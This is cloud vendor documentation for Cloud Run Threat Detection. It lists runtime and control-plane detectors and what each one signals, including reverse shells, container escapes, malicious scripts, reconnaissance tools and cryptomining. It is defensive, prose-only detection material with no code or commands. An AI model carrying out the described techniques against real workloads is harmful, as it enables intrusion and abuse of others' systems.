Cloud Run Threat Detection overview

Cloud Run Threat Detection is a built-in service of Security Command Center that continuously monitors the state of supported Cloud Run resources to detect the most common runtime attacks. If Cloud Run Threat Detection detects an attack, it generates a finding in Security Command Center in near real-time.

Cloud Run Threat Detection runtime detectors monitor Cloud Run resources for suspicious binaries and libraries and use natural language processing (NLP) to detect malicious Bash and Python code.

In addition, control plane detectors are available through Event Threat Detection. These detectors monitor the Cloud Logging stream of your organization or projects to detect potential attacks to the control plane of your Cloud Run resources.

Supported resources

Cloud Run Threat Detection monitors the following resources:

Supported execution environments

The supported execution environments differ for runtime detectors and control plane detectors.

Supported execution environments for runtime detectors

Cloud Run Threat Detection runtime detectors support only Cloud Run resources that run on the second generation execution environment. Consider the following before enabling Cloud Run Threat Detection:

  • When you enable Cloud Run Threat Detection, you can't create a Cloud Run service or service revision that runs on the first generation execution environment. The Cloud Run service must use the second generation execution environment. We recommend that you test your workloads on the second generation execution environment before enabling Cloud Run Threat Detection.

  • To enable runtime threat detection for a service, deploy a revision that sets the execution environment of the service to either the second generation or the default execution environment.

Supported execution environments for control plane detectors

The control plane detectors support both first and second generation execution environments.

How Cloud Run Threat Detection runtime threat detection works

When you enable Cloud Run Threat Detection, it collects telemetry from the supported Cloud Run resources to analyze processes, scripts, and libraries that might indicate a runtime attack. The following is the execution path when events are detected:

  1. Cloud Run Threat Detection uses a watcher process to collect container and event information for the complete duration of a Cloud Run workload. It can take up to 20 seconds for the watcher process to start.
  2. Cloud Run Threat Detection analyzes the collected event information to determine whether an event is indicative of an incident. It uses NLP to analyze Bash and Python scripts for malicious code.

    • If Cloud Run Threat Detection identifies an incident, it reports the incident as a finding in Security Command Center.

    • If Cloud Run Threat Detection doesn't identify an incident, no information is stored.

    • All data collected is ephemeral and isn't persistently stored.

For information about how to review Cloud Run Threat Detection findings in the Google Cloud console, see Review findings.

Known issues

  • Instances of your Cloud Run services or jobs that live longer than seven days stop sending telemetry information.
  • If the watcher process prematurely stops in a running instance of your Cloud Run service or job, the watcher process doesn't restart. The instance stops sending telemetry information to Cloud Run Threat Detection. Cloud Run Threat Detection logs are absent from the instance logs. There is no indicator that a watcher process has stopped.

Detectors

This section lists the runtime and control plane detectors that are available. We regularly add new detectors as new cloud threats emerge.

Runtime detectors

Cloud Run Threat Detection includes the following runtime detectors:

Display name API name Description
Execution: Added Malicious Binary Executed CLOUD_RUN_ADDED_MALICIOUS_BINARY_EXECUTED

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Not part of the original container image

If an added malicious binary is executed, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Added Malicious Library Loaded CLOUD_RUN_ADDED_MALICIOUS_LIBRARY_LOADED

A library that meets the following conditions was loaded:

  • Identified as malicious based on threat intelligence
  • Not part of the original container image

If an added malicious library is loaded, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Built in Malicious Binary Executed CLOUD_RUN_BUILT_IN_MALICIOUS_BINARY_EXECUTED

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Included in the original container image

If a built-in malicious binary is executed, it's a sign that the attacker is deploying malicious containers. They may have gained control of a legitimate image repository or container build pipeline and injected a malicious binary into the container image.

Execution: Container Escape CLOUD_RUN_CONTAINER_ESCAPE

A process was executed within the container that attempted to break out of the container's isolation, using known escape techniques or binaries. This type of attack can give the attacker access to the host system. These processes are identified as potential threats based on intelligence data.

If a container escape attempt is detected, it might indicate that an attacker is exploiting vulnerabilities to break out of the container. As a result, the attacker might gain unauthorized access to the host system or broader infrastructure, compromising the entire environment.

Execution: Kubernetes Attack Tool Execution CLOUD_RUN_KUBERNETES_ATTACK_TOOL_EXECUTION

A Kubernetes-specific attack tool was executed within the environment, which can indicate that an attacker is targeting Kubernetes cluster components. These attack tools are identified as potential threats based on intelligence data.

If an attack tool is executed within the Kubernetes environment, it can suggest that an attacker has gained access to the cluster and is using the tool to exploit Kubernetes-specific vulnerabilities or configurations.

Execution: Local Reconnaissance Tool Execution CLOUD_RUN_LOCAL_RECONNAISSANCE_TOOL_EXECUTION

A local reconnaissance tool not typically associated with the container or environment was executed, suggesting an attempt to gather internal system information. These reconnaissance tools are identified as potential threats based on intelligence data.

If a reconnaissance tool is executed, it suggests that the attacker may be trying to map out the infrastructure, identify vulnerabilities, or collect data on system configurations to plan their next steps.

Execution: Malicious Python executed (Preview) CLOUD_RUN_MALICIOUS_PYTHON_EXECUTED

A machine learning model identified the specified Python code as malicious. Attackers can use Python to transfer tools or other files from an external system into a compromised environment and execute commands without binaries.

The detector uses NLP techniques to evaluate the content of executed Python code. Because this approach is not based on signatures, detectors can identify known and novel Python code.

Execution: Modified Malicious Binary Executed CLOUD_RUN_MODIFIED_MALICIOUS_BINARY_EXECUTED

A binary that meets the following conditions was executed:

  • Identified as malicious based on threat intelligence
  • Included in the original container image
  • Modified from the original container image during the runtime

If a modified malicious binary is executed, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Execution: Modified Malicious Library Loaded CLOUD_RUN_MODIFIED_MALICIOUS_LIBRARY_LOADED

A library that meets the following conditions was loaded:

  • Identified as malicious based on threat intelligence
  • Included in the original container image
  • Modified from the original container image during the runtime

If a modified malicious library is loaded, it's a strong sign that an attacker has control of the workload and they are executing malicious software.

Malicious Script Executed CLOUD_RUN_MALICIOUS_SCRIPT_EXECUTED

A machine learning model identified the specified Bash code as malicious. Attackers can use Bash to transfer tools or other files from an external system into a compromised environment and execute commands without binaries.

The detector uses NLP techniques to evaluate the content of executed Bash code. Because this approach is not based on signatures, detectors can identify known and novel malicious Bash code.

Malicious URL Observed CLOUD_RUN_MALICIOUS_URL_OBSERVED

Cloud Run Threat Detection observed a malicious URL in the argument list of a running process.

The detector checks URLs that are observed in the argument list of running processes against the lists of unsafe web resources that are maintained by the Google Safe Browsing service. If a URL is incorrectly classified as a phishing site or malware, report it at Reporting Incorrect Data.

Reverse Shell CLOUD_RUN_REVERSE_SHELL

A process started with stream redirection to a remote connected socket. The detector looks for stdin bound to a remote socket.

With a reverse shell, an attacker can communicate from a compromised workload to an attacker-controlled machine. The attacker can then command and control the workload—for example, as part of a botnet.

Unexpected Child Shell CLOUD_RUN_UNEXPECTED_CHILD_SHELL

A process that does not normally invoke shells spawned a shell process.

The detector monitors all process executions. When a shell is invoked, the detector generates a finding if the parent process is known to not typically invoke shells.

Control plane detectors

The following control plane detectors are available through Event Threat Detection. These detectors are enabled by default. You manage these detectors the same way you do other Event Threat Detection detectors. For more information, see Use Event Threat Detection.

Display name API name Log source types Description
Impact: Cryptomining Commands (Preview) CLOUD_RUN_JOBS_CRYPTOMINING_COMMANDS Cloud Audit Logs:
IAM System Event audit logs
Identifies when specific cryptomining commands are attached to a Cloud Run job during execution.
Execution: Cryptomining Docker Image (Preview) CLOUD_RUN_CRYPTOMINING_DOCKER_IMAGES Cloud Audit Logs:
IAM System Event audit logs
Identifies when specific known bad docker images are attached to a new or existing Cloud Run service or job.
Privilege Escalation: Default Compute Engine Service Account SetIAMPolicy (Preview) CLOUD_RUN_SERVICES_SET_IAM_POLICY Cloud Audit Logs:
Admin Activity logs
Detects when the default Compute Engine service account is used to set the IAM policy for a Cloud Run service. This is a potential post exploit action when a Compute Engine token is compromised from a serverless service.
For deprecated and shut down rules, see Deprecations.

What's next